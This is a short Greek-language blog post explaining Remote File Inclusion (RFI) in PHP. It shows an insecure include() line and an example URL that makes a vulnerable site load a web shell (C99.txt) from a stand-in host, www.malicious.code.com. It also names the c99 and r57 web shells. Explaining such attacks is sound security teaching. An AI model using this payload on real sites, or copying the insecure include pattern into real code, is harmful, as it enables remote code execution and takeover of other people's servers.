tsirogiannis.com |Technology and research

Καταρχήν, R.F.I. = Remote File Inclusion και είναι ένας από τους πάρα πολλούς τρόπους για να κάνεις deface ή να πάρεις root σε ένα μηχάνημα, εκμεταλλευόμενος πάντα κάποια “αδυναμία” στον κώδικα (vulnerability).

Η επίθεση με R.F.I. επιτρέπει σε αυτόν που κάνει την επίθεση να τρέξει τον δικό του κώδικα – συνήθως php – (script) στο site στο οποίο έχει τις “αδυναμίες” στον κώδικα.

Ένα παράδειγμα από κώδικα που μπορεί να δεχθεί επίθεση γιατί η μεταβλητή δεν καθορίζεται συγκεκριμένα:
(Το παράδειγμα είναι τυπικό και είναι για την συγκεκριμένη περίπτωση του παραδείγματος)

include($title . '/archive.php');

και το url:

www.vulnerable.website.com/index.php?title=archive.php?

Κάποιος μπορεί να εκμεταλλευτεί την αδυναμία αυτή και να εκτελέσει ένα php script που θα του δώσει την δυνατότητα να εκτελέσει κάποιες εντολές, να ανεβάσει αρχεία (ανάλογα με τα permissions) και γενικά να πάρει πληροφορίες.

Tα scripts αυτά είναι γνωστά ως web shells. Tα πιο γνωστά web shells είναι το: c99 και το r57.

O τρόπος με τον οποίο μπορούν να εκτελεστούν είναι ο εξής:

www.vulnerable.website.com/index.php?title=http://www.malicious.code.com/C99.txt?archive.php

Στην θέση του C99.txt θα μπορούσε να είναι οποιοδήποτε αρχείο με κώδικα το οποίο είναι ανεβασμένο σε έναν remote web server. Στο παράδειγμα αυτό ο server είναι: www.malicious.code.com.

Πρέπει να σημειώσουμε πως θα πρέπει ο server στον οποίο είναι ανεβασμένη η σελίδα με τις αδυναμίες στον κώδικα να “επιτρέπει” το R.F.I. γιατί υπάρχουν τρόποι & ρυθμίσεις που αποτρέπουν την εκτέλεση remote αρχείων.

Για να βρει κάποιος αδυναμίες σε ένα site, θα πρέπει να έχει λίγες γνώσεις προγραμματισμού και κάποια εργαλεία ανίχνευσης αυτών των αδυναμιών, τα λεγόμενα scanners, που μπορεί να είναι προγράμματα, μηχανές αναζήτησης, ακόμα και bots που τρέχουν σε IRC Servers.

Share on Facebook